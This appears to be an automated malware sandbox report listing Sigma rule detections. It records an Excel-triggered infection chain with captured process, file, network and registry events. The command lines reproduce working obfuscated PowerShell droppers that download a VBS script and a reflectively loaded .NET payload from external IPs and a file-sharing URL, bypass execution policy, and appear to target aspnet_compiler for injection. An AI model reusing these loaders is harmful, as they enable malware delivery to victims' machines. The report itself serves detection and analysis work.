      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 2764, ProcessName: wscript.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", ProcessId: 3328, ProcessName: csc.exe
      Sigma detected: Excel Network Connections
      Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 152.231.117.86, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS
      Sigma detected: Suspicious Office Outbound Connections
      Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 152.231.117.86, SourceIsIpv6: false, SourcePort: 443
      Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 2764, ProcessName: wscript.exe
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline
      Sigma detected: Modification of IE Registry Settings
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3620, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgI